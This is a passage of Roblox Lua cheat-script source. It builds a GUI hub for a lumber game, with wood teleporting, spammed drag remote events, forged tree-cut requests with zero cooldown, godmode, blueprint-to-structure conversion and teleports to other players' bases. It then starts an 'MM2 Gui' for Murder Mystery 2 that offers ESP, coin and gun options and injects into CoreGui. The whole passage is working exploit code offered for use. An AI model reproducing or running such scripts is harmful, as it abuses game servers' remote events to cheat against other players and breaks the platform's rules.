game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true l.Changed:Connect(function() if l then l.WalkSpeed=Walk l.JumpPower=Jump end end) end function SetTransOfShadow(Trans,UI) for i,v in pairs(UI:GetChildren()) do if v.Name=="Shadow" then v.Transparency=Trans end end end function MakeShadow(UI,Index) Create("Frame",{Parent=UI,Size=UDim2.new(1,0,1,0),ZIndex=Index,Position=UDim2.new(0,1,0,1),BackgroundColor3=Color3.fromRGB(0,0,0),BorderSizePixel=0,Transparency=0.9,Name="Shadow"}) Create("Frame",{Parent=UI,Size=UDim2.new(1,0,1,0),ZIndex=Index,Position=UDim2.new(0,2,0,2),BackgroundColor3=Color3.fromRGB(0,0,0),BorderSizePixel=0,Transparency=0.9,Name="Shadow"}) Create("Frame",{Parent=UI,Size=UDim2.new(1,0,1,0),ZIndex=Index,Position=UDim2.new(0,3,0,3),BackgroundColor3=Color3.fromRGB(0,0,0),BorderSizePixel=0,Transparency=0.9,Name="Shadow"}) end local Glitching=false local Main = Create("ScreenGui",{Parent=service.Players.LocalPlayer.PlayerGui,Name="DrSTaTTiK"}) local Open = Create("TextButton",{Parent=Main,Size=UDim2.new(0,40,0,20),ZIndex=2,Position=UDim2.new(.5,-20,.9,-10),Text="Open",BackgroundColor3=Color3.fromRGB(218, 114, 45),BorderSizePixel=0}) local Hub = Create("Frame",{Parent=Main,Size=UDim2.new(0,400,0,300),Position=UDim2.new(.3,0,.5,0),Draggable=true,Visible=false,Transparency=1,ZIndex=100,Active=true}) local TopBar = Create("Frame",{Parent=Hub,Size=UDim2.new(1,0,.1,0),BackgroundColor3=Color3.fromRGB(218, 114, 45),BorderSizePixel=0,ZIndex=4}) local Exit = Create("TextButton",{Parent=TopBar,ZIndex=4,Size=UDim2.new(.075,0,1,0),Position=UDim2.new(.925,0,0,0),TextScaled=false,TextSize=14,BackgroundTransparency=1,Text="X"}) local Name = Create("TextLabel",{Parent=TopBar,ZIndex=4,Size=UDim2.new(.5,0,1,0),Position=UDim2.new(0,10,0,0),TextStrokeTransparency=0.9,Text="Produced by DrSTaTTiK",TextColor3=Color3.fromRGB(230,230,230),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local Menu = Create("ImageLabel",{Parent=Hub,Size=UDim2.new(1,0,.9,0),ZIndex=2,ImageColor3=Color3.fromRGB(100,100,100),ScaleType="Tile",TileSize=UDim2.new(0,100,0,100),Image="rbxassetid://585867512",Position=UDim2.new(0,0,.1,0),BorderSizePixel=0}) local TPWood = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0,10,0,10),Text="TPWood",BorderSizePixel=0}) local TPWoodToSell = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(.75,-10,0,10),Text="Sell Wood",BorderSizePixel=0}) local GodMode = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(.75,-10,0.1,20),Text="GodMode",BorderSizePixel=0}) --local TPWoodToPrecess = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(.75,-10,0.1,20),Text="Process Wood",BorderSizePixel=0}) local GlitchWood = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0,10,0.1,20),Text="GlitchWood: Off",BorderSizePixel=0}) local WalkSpeed = Create("TextBox",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.1,0,.1,0),Position=UDim2.new(0.15,10,0.2,30),Text="16",BorderSizePixel=0}) local WalkSpeedName = Create("TextLabel",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.125,0,.1,0),Position=UDim2.new(0,1,0.2,30),Text="WalkSpeed:",TextSize=8,TextXAlignment="Left",BorderSizePixel=0,TextColor3=Color3.fromRGB(255,255,255),BackgroundTransparency=1}) local JumpPower = Create("TextBox",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.1,0,.1,0),Position=UDim2.new(.15,10,0.3,40),Text="50",BorderSizePixel=0}) local JumpPowerName = Create("TextLabel",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.125,0,.1,0),Position=UDim2.new(0,1,0.3,40),Text="JumpPower:",TextSize=8,TextXAlignment="Left",BorderSizePixel=0,TextColor3=Color3.fromRGB(255,255,255),BackgroundTransparency=1}) local TabDistance = Create("TextLabel",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0.35,0,0.02,20),Text="Length",TextColor3=Color3.fromRGB(255,255,255),BackgroundTransparency=1,BorderSizePixel=0}) local Distance = Create("TextBox",{Parent=Menu,ZIndex=4,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0.35,0,0.1,20),BackgroundColor3=Color3.fromRGB(200,200,200),Text="50",BorderSizePixel=0}) local Hub2 = Create("Frame",{Parent=Main,Size=UDim2.new(0,150,0,300),Position=UDim2.new(.3,410,.5,0),Draggable=true,Visible=false,Transparency=1,ZIndex=100,Active=true}) local TopBar2 = Create("Frame",{Parent=Hub2,Size=UDim2.new(1,0,.1,0),BackgroundColor3=Color3.fromRGB(218, 114, 45),BorderSizePixel=0,ZIndex=4}) local Name2 = Create("TextLabel",{Parent=TopBar2,ZIndex=4,Size=UDim2.new(.5,0,1,0),Position=UDim2.new(0,10,0,0),TextStrokeTransparency=0.9,Text="WayPoints",TextColor3=Color3.fromRGB(230,230,230),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local Menu2 = Create("ImageLabel",{Parent=Hub2,Size=UDim2.new(1,0,.9,0),ZIndex=2,ImageColor3=Color3.fromRGB(100,100,100),ScaleType="Tile",TileSize=UDim2.new(0,100,0,100),Image="rbxassetid://585867512",Position=UDim2.new(0,0,.1,0),BorderSizePixel=0}) local WayPoints = Create("ScrollingFrame",{Parent=Menu2,ZIndex=4,BorderSizePixel=0,Size=UDim2.new(.8,0,.9,0),BackgroundColor3=Color3.fromRGB(50,50,50),Position=UDim2.new(.1,0,0.05,0),ScrollBarThickness=0,Transparency=0.8}) local Hub3 = Create("Frame",{Parent=Main,Size=UDim2.new(0,150,0,300),Position=UDim2.new(.3,-160,.5,0),Draggable=true,Visible=false,Transparency=1,ZIndex=100,Active=true}) local TopBar3 = Create("Frame",{Parent=Hub3,Size=UDim2.new(1,0,.1,0),BackgroundColor3=Color3.fromRGB(218, 114, 45),BorderSizePixel=0,ZIndex=4}) local Name3 = Create("TextLabel",{Parent=TopBar3,ZIndex=4,Size=UDim2.new(.5,0,1,0),Position=UDim2.new(0,10,0,0),TextStrokeTransparency=0.9,Text="Player Bases",TextColor3=Color3.fromRGB(230,230,230),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local Menu3 = Create("ImageLabel",{Parent=Hub3,Size=UDim2.new(1,0,.9,0),ZIndex=2,ImageColor3=Color3.fromRGB(100,100,100),ScaleType="Tile",TileSize=UDim2.new(0,100,0,100),Image="rbxassetid://585867512",Position=UDim2.new(0,0,.1,0),BorderSizePixel=0}) local PlayersBases = Create("ScrollingFrame",{Parent=Menu3,ZIndex=4,BorderSizePixel=0,Size=UDim2.new(.8,0,.9,0),BackgroundColor3=Color3.fromRGB(50,50,50),Position=UDim2.new(.1,0,0.05,0),ScrollBarThickness=0,Transparency=0.8}) local Hub4 = Create("Frame",{Parent=Main,Size=UDim2.new(0,150,0,300),Position=UDim2.new(.3,-330,.5,0),Draggable=true,Visible=false,Transparency=1,ZIndex=100,Active=true}) local Menu4 = Create("ImageLabel",{Parent=Hub4,Size=UDim2.new(1,0,.9,0),ZIndex=2,ImageColor3=Color3.fromRGB(100,100,100),ScaleType="Tile",TileSize=UDim2.new(0,100,0,100),Image="rbxassetid://585867512",Position=UDim2.new(0,0,.1,0),BorderSizePixel=0}) local TopBar4 = Create("Frame",{Parent=Hub4,Size=UDim2.new(1,0,.1,0),BackgroundColor3=Color3.fromRGB(218, 114, 45),BorderSizePixel=0,ZIndex=4}) local Name3 = Create("TextLabel",{Parent=TopBar4,ZIndex=4,Size=UDim2.new(.5,0,1,0),Position=UDim2.new(0,10,0,0),TextStrokeTransparency=0.9,Text="Players",TextColor3=Color3.fromRGB(230,230,230),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local Players = Create("ScrollingFrame",{Parent=Menu4,ZIndex=4,BorderSizePixel=0,Size=UDim2.new(.8,0,.9,0),BackgroundColor3=Color3.fromRGB(50,50,50),Position=UDim2.new(.1,0,0.05,0),ScrollBarThickness=0,Transparency=0.8}) local TeleportToSpook = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0,10,0.4,50),Text="Teleport to Spook",BorderSizePixel=0}) local BlueprintToGreyWood = Create("TextButton",{Parent=Menu,ZIndex=3,Size=UDim2.new(0.25,0,.1,0),Position=UDim2.new(0,10,0.5,60),Text="Blueprint to\nGreyWood",BorderSizePixel=0}) local Warning = Create("TextLabel",{Parent=Hub,ZIndex=4,Size=UDim2.new(.5,0,1,5),Position=UDim2.new(0,0,.5,10),TextStrokeTransparency=0.7,Text="Press or hold E to use the GlitchWood option.\nAfter clicking Blueprint to GreyWood pick the blueprint up then palce it back down with B/E",TextColor3=Color3.fromRGB(218, 114, 45),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local WarningGreyWood = Create("TextLabel",{Parent=Hub,ZIndex=4,Size=UDim2.new(.5,0,1,55),Position=UDim2.new(0,0,.5,10),TextStrokeTransparency=0.7,Text="Some Blueprints do not turn to GreyWood so if you lose a Blueprint oh well. \nand dont try to cut trees with their corresponding super axe you will die.",TextColor3=Color3.fromRGB(255, 0, 0),BackgroundTransparency=1,TextXAlignment="Left",BorderSizePixel=0}) local Minimize = Create("TextButton",{Parent=TopBar,ZIndex=4,Size=UDim2.new(.1,0,1,0),Position=UDim2.new(.85,0,0,0),TextScaled=true,TextSize=14,BackgroundTransparency=1,Text="-"}) local Minimize2 = Create("TextButton",{Parent=TopBar2,ZIndex=4,Size=UDim2.new(.1,0,1,0),Position=UDim2.new(.85,0,0,0),TextScaled=true,TextSize=14,BackgroundTransparency=1,Text="-"}) local Minimize3 = Create("TextButton",{Parent=TopBar3,ZIndex=4,Size=UDim2.new(.1,0,1,0),Position=UDim2.new(.85,0,0,0),TextScaled=true,TextSize=14,BackgroundTransparency=1,Text="-"}) local Minimize4 = Create("TextButton",{Parent=TopBar4,ZIndex=4,Size=UDim2.new(.1,0,1,0),Position=UDim2.new(.85,0,0,0),TextScaled=true,TextSize=14,BackgroundTransparency=1,Text="-"}) MakeShadow(TopBar,3) MakeShadow(Hub,1) MakeShadow(Hub2,1) MakeShadow(TopBar2,3) MakeShadow(Hub3,1) MakeShadow(TopBar3,3) MakeShadow(Hub4,1) MakeShadow(TopBar4,3) MakeShadow(TPWood,2) MakeShadow(GlitchWood,2) MakeShadow(Distance,2) MakeShadow(Open,0) MakeShadow(WalkSpeed,2) MakeShadow(JumpPower,2) MakeShadow(TPWoodToSell,2) MakeShadow(TeleportToSpook,2) --MakeShadow(TPWoodToPrecess,2) MakeShadow(BlueprintToGreyWood,2) MakeShadow(GodMode,2) local numb=0 for key,value in next, WayPointss do WayPoints.CanvasSize=UDim2.new(0,0,0,30*numb) local button = Create("TextButton",{Parent=WayPoints,Text=key,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numb)}) MakeShadow(button,3) numb=numb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(value.p+Vector3.new(0,5,0)) end) end local numbb=0 for i,v in pairs(service.Workspace.Properties:GetChildren()) do if v.Owner and v.Owner.Value then PlayersBases.CanvasSize=UDim2.new(0,0,0,30*numbb) local button = Create("TextButton",{Parent=PlayersBases,Text=v.Owner.Value.Name,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numbb)}) MakeShadow(button,3) numbb=numbb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v.OriginSquare.Position+Vector3.new(0,5,0)) end) end v.Owner.Changed:Connect(function() numbb=0 PlayersBases:ClearAllChildren() for i,v in pairs(service.Workspace.Properties:GetChildren()) do if v.Owner and v.Owner.Value then PlayersBases.CanvasSize=UDim2.new(0,0,0,30*numbb) local button = Create("TextButton",{Parent=PlayersBases,Text=v.Owner.Value.Name,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numbb)}) MakeShadow(button,3) numbb=numbb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v.OriginSquare.Position+Vector3.new(0,5,0)) end) end end numbb=0 end) end local numbbb=0 for i,v in pairs(service.Players:GetPlayers()) do if v.Character then Players.CanvasSize=UDim2.new(0,0,0,30*numbbb) local button = Create("TextButton",{Parent=Players,Text=v.Name,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numbbb)}) MakeShadow(button,3) numbbb=numbbb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v.Character.HumanoidRootPart.Position+Vector3.new(0,5,0)) end) end end service.Players.PlayerAdded:Connect(function() numbbb=0 Players:ClearAllChildren() for i,v in pairs(service.Players:GetPlayers()) do while not v.Character do wait() end if v.Character then Players.CanvasSize=UDim2.new(0,0,0,30*numbbb) local button = Create("TextButton",{Parent=Players,Text=v.Name,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numbbb)}) MakeShadow(button,3) numbbb=numbbb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v.Character.HumanoidRootPart.Position+Vector3.new(0,5,0)) end) end end numbbb=0 end) service.Players.PlayerRemoving:Connect(function() numbbb=0 Players:ClearAllChildren() for i,v in pairs(service.Players:GetPlayers()) do if v.Character then Players.CanvasSize=UDim2.new(0,0,0,30*numbbb) local button = Create("TextButton",{Parent=Players,Text=v.Name,Size=UDim2.new(1,0,0,20),ZIndex=4,BorderSizePixel=0,Position=UDim2.new(0,0,0,30*numbbb)}) MakeShadow(button,3) numbbb=numbbb+1 button.MouseButton1Click:Connect(function() service.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v.Character.HumanoidRootPart.Position+Vector3.new(0,5,0)) end) end end numbbb=0 end) Minimize.MouseButton1Click:Connect(function() if Menu.Visible==true then Menu.Visible=false Warning.Visible=false SetTransOfShadow(1,Hub) else Menu.Visible=true Warning.Visible=true SetTransOfShadow(0.9,Hub) end end) Minimize2.MouseButton1Click:Connect(function() if Menu2.Visible==true then Menu2.Visible=false SetTransOfShadow(1,Hub2) else Menu2.Visible=true SetTransOfShadow(0.9,Hub2) end end) Minimize3.MouseButton1Click:Connect(function() if Menu3.Visible==true then Menu3.Visible=false SetTransOfShadow(1,Hub3) else Menu3.Visible=true SetTransOfShadow(0.9,Hub3) end end) Minimize4.MouseButton1Click:Connect(function() if Menu4.Visible==true then Menu4.Visible=false SetTransOfShadow(1,Hub4) else Menu4.Visible=true SetTransOfShadow(0.9,Hub4) end end) Exit.MouseButton1Click:Connect(function() if Hub.Visible then Hub.Visible=false Hub2.Visible=false Hub3.Visible=false Hub4.Visible=false Open.Visible=true end end) Open.MouseButton1Click:Connect(function() if not Hub.Visible then Hub.Visible=true Hub2.Visible=true Hub3.Visible=true Hub4.Visible=true Open.Visible=false end end) GodMode.MouseButton1Click:Connect(function() god() end) WalkSpeed.Changed:Connect(function() Walk=tonumber(WalkSpeed.Text) end) BlueprintToGreyWood.MouseButton1Click:Connect(function() for i,v in next,game:GetService("Workspace").PlayerModels:GetChildren() do if v:FindFirstChild("Type") then if v.Type.Value == "Blueprint" then v.Type.Value = "Structure" end end end end) JumpPower.Changed:Connect(function() Jump=tonumber(JumpPower.Text) end) service.Players.LocalPlayer.Character.Humanoid.Changed:Connect(function() if service.Players.LocalPlayer.Character:FindFirstChild("Humanoid") then service.Players.LocalPlayer.Character.Humanoid.WalkSpeed=Walk service.Players.LocalPlayer.Character.Humanoid.JumpPower=Jump end end) BlueprintToGreyWood.MouseButton1Click:Connect(function() for i,v in next,game:GetService("Workspace").PlayerModels:GetChildren() do if v:FindFirstChild("Type") then if v.Type.Value == "Blueprint" then v.Type.Value = "Structure" end end end end) TPWood.MouseButton1Click:Connect(function() for _, Log in pairs(service.Workspace.LogModels:GetChildren()) do if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then if Log.Owner.Value == service.Players.LocalPlayer then Log:MoveTo(service.Players.LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0, 20, 0)) for i=1,100 do service.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log) end end end end end) TPWoodToSell.MouseButton1Click:Connect(function() for _, Log in pairs(service.Workspace.LogModels:GetChildren()) do if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then if Log.Owner.Value == service.Players.LocalPlayer then for i,v in pairs(Log:GetChildren()) do if v.Name=="WoodSection" then spawn(function() for i=1,10 do wait() v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0) end end) end end spawn(function() for i=1,20 do wait() service.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log) end end) end end end end) TeleportToSpook.MouseButton1Click:Connect(function() for i, v in pairs(game:GetService("Workspace"):GetChildren()) do if v.Name == "TreeRegion" then for j, k in ipairs(v:GetChildren()) do if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Spooky" or k:FindFirstChild("TreeClass") and k.TreeClass.Value == "SpookyNeon" then game:GetService("Players").LocalPlayer.Character:MoveTo(k.WoodSection.Position) break end end end end end) GlitchWood.MouseButton1Click:Connect(function() if not Glitching then Glitching=true GlitchWood.Text="GlitchWood: On" else Glitching=false GlitchWood.Text="GlitchWood: Off" end end) local Pressing = false game:GetService("Players").LocalPlayer:GetMouse().KeyDown:Connect(function(key) if key=="e" and Glitching then Pressing=true poop(GetAxe()) end end) game:GetService("Players").LocalPlayer:GetMouse().KeyUp:Connect(function(key) if key=="e" then Pressing=false end end) function cut(Height,Tool) local Tree=game:GetService("Players").LocalPlayer:GetMouse().Target game:GetService("ReplicatedStorage").Interaction.RemoteProxy:FireServer(Tree.Parent.CutEvent,{ ["cuttingClass"] = "Axe", ["cooldown"] = 0, ["hitPoints"] = HitPoints[Tool.ToolName.Value], ["sectionId"] = 1, ["tool"] = Tool, ["faceVector"] = Vector3.new(-1,0,0), ["height"] = Height}) end function poop(Tool) while Pressing do for i=1,50 do wait() cut(tonumber(Distance.Text),Tool) cut(1,Tool) end end end end) mudrdermystery2.Name = "mudrdermystery2" mudrdermystery2.Parent = Main mudrdermystery2.BackgroundColor3 = Color3.new(1, 1, 1) mudrdermystery2.Position = UDim2.new(0.325179845, 0, 0.674740493, 0) mudrdermystery2.Size = UDim2.new(0, 200, 0, 25) mudrdermystery2.Font = Enum.Font.SourceSans mudrdermystery2.Text = "Murder Mystery 2" mudrdermystery2.TextColor3 = Color3.new(0, 0, 0) mudrdermystery2.TextSize = 25 mudrdermystery2.MouseButton1Down:connect(function() -- Made by abs_0 (absoabsolute0) -- Objects local mygui = Instance.new("ScreenGui") local maintab = Instance.new("Frame") local title = Instance.new("TextLabel") local bodyframe = Instance.new("Frame") local menuframe = Instance.new("Frame") local generalbuttonframe = Instance.new("Frame") local generalbutton = Instance.new("TextButton") local generalbuttonlabel = Instance.new("ImageLabel") local lpbuttonframe = Instance.new("Frame") local lpbutton = Instance.new("TextButton") local lpbuttonlabel = Instance.new("ImageLabel") local tpbuttonframe = Instance.new("Frame") local tpbutton = Instance.new("TextButton") local tpbuttonlabel = Instance.new("ImageLabel") local tptextbox = Instance.new("TextBox") local tpunderline = Instance.new("Frame") local tpunderlinebase = Instance.new("Frame") local generalframe = Instance.new("Frame") local generalespframe = Instance.new("Frame") local generalespbutton = Instance.new("TextButton") local generalesplabel = Instance.new("ImageLabel") local generalcoinframe = Instance.new("Frame") local generalcoinbutton = Instance.new("TextButton") local generalcoinlabel = Instance.new("ImageLabel") local generalgunframe = Instance.new("Frame") local generalgunbutton = Instance.new("TextButton") local generalgunlabel = Instance.new("ImageLabel") local generallobbyframe = Instance.new("Frame") local generallobbybutton = Instance.new("TextButton") local generallobbylabel = Instance.new("ImageLabel") local lpframe = Instance.new("Frame") local lpjumpframe = Instance.new("Frame") local lpjumpbutton = Instance.new("TextButton") local lpjumplabel = Instance.new("ImageLabel") local lpgravframe = Instance.new("Frame") local lpgravbutton = Instance.new("TextButton") local lpgravlabel = Instance.new("ImageLabel") local lpwalkframe = Instance.new("Frame") local lpwalkbutton = Instance.new("TextButton") local lpwalklabel = Instance.new("ImageLabel") local lpgodframe = Instance.new("Frame") local lpgodbutton = Instance.new("TextButton") local lpgodlabel = Instance.new("ImageLabel") local backbutton1 = Instance.new("TextButton") local backbutton1label = Instance.new("ImageLabel") local backbutton2 = Instance.new("TextButton") local backbutton2label = Instance.new("ImageLabel") local creditsbutton = Instance.new("TextButton") local creditsiconlabel1 = Instance.new("ImageLabel") local creditsiconlabel2 = Instance.new("ImageLabel") local toggle = Instance.new("Frame") local closeall = Instance.new("TextButton") local closeopen = Instance.new("TextButton") local closeopenlabel = Instance.new("ImageLabel") local creditstab = Instance.new("Frame") local creditstitle = Instance.new("TextLabel") local creditsframe = Instance.new("Frame") local creditsmenuframe = Instance.new("Frame") local creditsfield = Instance.new("TextLabel") local closecredits = Instance.new("TextButton") -- Properties mygui.Name = "mygui" mygui.Parent = game:GetService("CoreGui") maintab.Name = "maintab" maintab.Parent = mygui maintab.Active = true maintab.BackgroundColor3 = Color3.new(1, 1, 1) maintab.BackgroundTransparency = 0.5 maintab.BorderSizePixel = 0 maintab.Draggable = true maintab.Position = UDim2.new(0, 900, 0, 330) maintab.Size = UDim2.new(0, 256, 0, 30) title.Name = "title" title.Parent = maintab title.BackgroundColor3 = Color3.new(0, 0.45098, 0.862745) title.BorderSizePixel = 0 title.Size = UDim2.new(0, 256, 0, 30) title.Font = Enum.Font.SourceSansBold title.FontSize = Enum.FontSize.Size24 title.Text = "MM2 Gui" title.TextColor3 = Color3.new(1, 1, 1) title.TextSize = 23 bodyframe.Name = "bodyframe" bodyframe.Parent = maintab bodyframe.BackgroundColor3 = Color3.new(0, 0.615686, 1) bodyframe.BorderSizePixel = 0 bodyframe.ClipsDescendants = true bodyframe.Position = UDim2.new(0, 0, 0, 30) bodyframe.Size = UDim2.new(0, 256, 0, 222) menuframe.Name = "menuframe" menuframe.Parent = bodyframe menuframe.BackgroundColor3 = Color3.new(1, 1, 1) menuframe.BackgroundTransparency = 1 menuframe.BorderSizePixel = 0 menuframe.Size = UDim2.new(0, 256, 0, 222) generalbuttonframe.Name = "generalbuttonframe" generalbuttonframe.Parent = menuframe generalbuttonframe.BackgroundColor3 = Color3.new(1, 1, 1) generalbuttonframe.BorderSizePixel = 0 generalbuttonframe.Position = UDim2.new(0, 31, 0, 31) generalbuttonframe.Size = UDim2.new(0, 194, 0, 31) generalbutton.Name = "generalbutton" generalbutton.Parent = generalbuttonframe generalbutton.BackgroundColor3 = Color3.new(1, 1, 1) generalbutton.BackgroundTransparency = 1 generalbutton.BorderSizePixel = 0 generalbutton.ClipsDescendants = true generalbutton.Size = UDim2.new(0, 194, 0, 30) generalbutton.Font = Enum.Font.SourceSansSemibold generalbutton.FontSize = Enum.FontSize.Size24 generalbutton.Text = "General" generalbutton.TextColor3 = Color3.new(0, 0.615686, 1) generalbutton.TextSize = 20 generalbuttonlabel.Name = "generalbuttonlabel" generalbuttonlabel.Parent = generalbutton generalbuttonlabel.AnchorPoint = Vector2.new(0.5, 0.5) generalbuttonlabel.BackgroundColor3 = Color3.new(1, 1, 1) generalbuttonlabel.BackgroundTransparency = 1 generalbuttonlabel.BorderSizePixel = 0 generalbuttonlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) generalbuttonlabel.Size = UDim2.new(0, 50, 0, 50) generalbuttonlabel.Visible = false generalbuttonlabel.Image = "rbxassetid://200182847" generalbuttonlabel.ImageColor3 = Color3.new(0, 0.705882, 1) generalbuttonlabel.ImageTransparency = 0.80000001192093 lpbuttonframe.Name = "lpbuttonframe" lpbuttonframe.Parent = menuframe lpbuttonframe.BackgroundColor3 = Color3.new(1, 1, 1) lpbuttonframe.BorderSizePixel = 0 lpbuttonframe.Position = UDim2.new(0, 31, 0, 96) lpbuttonframe.Size = UDim2.new(0, 194, 0, 31) lpbutton.Name = "lpbutton" lpbutton.Parent = lpbuttonframe lpbutton.BackgroundColor3 = Color3.new(1, 1, 1) lpbutton.BackgroundTransparency = 1 lpbutton.BorderSizePixel = 0 lpbutton.ClipsDescendants = true lpbutton.Size = UDim2.new(0, 194, 0, 30) lpbutton.Font = Enum.Font.SourceSansSemibold lpbutton.FontSize = Enum.FontSize.Size24 lpbutton.Text = "Local Player" lpbutton.TextColor3 = Color3.new(0, 0.615686, 1) lpbutton.TextSize = 19 lpbuttonlabel.Name = "lpbuttonlabel" lpbuttonlabel.Parent = lpbutton lpbuttonlabel.AnchorPoint = Vector2.new(0.5, 0.5) lpbuttonlabel.BackgroundColor3 = Color3.new(1, 1, 1) lpbuttonlabel.BackgroundTransparency = 1 lpbuttonlabel.BorderSizePixel = 0 lpbuttonlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) lpbuttonlabel.Size = UDim2.new(0, 50, 0, 50) lpbuttonlabel.Visible = false lpbuttonlabel.Image = "rbxassetid://200182847" lpbuttonlabel.ImageColor3 = Color3.new(0, 0.705882, 1) lpbuttonlabel.ImageTransparency = 0.80000001192093 tptextbox.Name = "tptextbox" tptextbox.Parent = menuframe tptextbox.BackgroundColor3 = Color3.new(1, 1, 1) tptextbox.BackgroundTransparency = 1 tptextbox.BorderSizePixel = 0 tptextbox.Position = UDim2.new(0, 31, 0, 165) tptextbox.Size = UDim2.new(0, 194, 0, 31) tptextbox.Font = Enum.Font.SourceSans tptextbox.FontSize = Enum.FontSize.Size18 tptextbox.Text = "Player Name" tptextbox.TextColor3 = Color3.new(1, 1, 1) tptextbox.TextSize = 15 tpunderline.Name = "tpunderline" tpunderline.Parent = tptextbox tpunderline.AnchorPoint = Vector2.new(0, 0) tpunderline.BackgroundColor3 = Color3.new(1, 1, 1) tpunderline.BorderSizePixel = 0 tpunderline.Position = UDim2.new(0.496815294, 0, 0.967741966, 0) tpunderline.Size = UDim2.new(0, 0, 0, 2) tpunderlinebase.Name = "tpunderlinebase" tpunderlinebase.Parent = tptextbox tpunderlinebase.AnchorPoint = Vector2.new(0.5, 0.5) tpunderlinebase.BackgroundColor3 = Color3.new(1, 1, 1) tpunderlinebase.BackgroundTransparency = 0.80000001192093 tpunderlinebase.BorderSizePixel = 0 tpunderlinebase.Position = UDim2.new(0.496815294, 0, 0.967741966, 0) tpunderlinebase.Size = UDim2.new(0, 157, 0, 2) tpunderlinebase.Visible = false --secretkey generalframe.Name = "generalframe" generalframe.Parent = bodyframe generalframe.BackgroundColor3 = Color3.new(1, 1, 1) generalframe.BackgroundTransparency = 1 generalframe.BorderSizePixel = 0 generalframe.Position = UDim2.new(0, 256, 0, 0) generalframe.Size = UDim2.new(0, 256, 0, 222) generalespframe.Name = "generalespframe" generalespframe.Parent = generalframe generalespframe.BackgroundColor3 = Color3.new(1, 1, 1) generalespframe.BorderSizePixel = 0 generalespframe.Position = UDim2.new(0, 31, 0, 172) generalespframe.Size = UDim2.new(0, 194, 0, 30) generalespbutton.Name = "generalespbutton" generalespbutton.Parent = generalespframe generalespbutton.BackgroundColor3 = Color3.new(1, 1, 1) generalespbutton.BackgroundTransparency = 1 generalespbutton.BorderSizePixel = 0 generalespbutton.ClipsDescendants = true generalespbutton.Size = UDim2.new(0, 194, 0, 30) generalespbutton.Font = Enum.Font.SourceSansSemibold generalespbutton.FontSize = Enum.FontSize.Size24 generalespbutton.Text = "ESP (Left Alt)" generalespbutton.TextColor3 = Color3.new(0, 0.615686, 1) generalespbutton.TextSize = 19 generalesplabel.Name = "generalesplabel" generalesplabel.Parent = generalespbutton generalesplabel.AnchorPoint = Vector2.new(0.5, 0.5) generalesplabel.BackgroundColor3 = Color3.new(1, 1, 1) generalesplabel.BackgroundTransparency = 1 generalesplabel.BorderSizePixel = 0 generalesplabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) generalesplabel.Size = UDim2.new(0, 50, 0, 50) generalesplabel.Visible = false generalesplabel.Image = "rbxassetid://200182847" generalesplabel.ImageColor3 = Color3.new(0, 0.705882, 1) generalesplabel.ImageTransparency = 0.80000001192093 generalcoinframe.Name = "generalcoinframe" generalcoinframe.Parent = generalframe generalcoinframe.BackgroundColor3 = Color3.new(1, 1, 1) generalcoinframe.BorderSizePixel = 0 generalcoinframe.Position = UDim2.new(0, 31, 0, 120) generalcoinframe.Size = UDim2.new(0, 194, 0, 30) generalcoinbutton.Name = "generalcoinbutton" generalcoinbutton.Parent = generalcoinframe generalcoinbutton.BackgroundColor3 = Color3.new(1, 1, 1) generalcoinbutton.BackgroundTransparency = 1 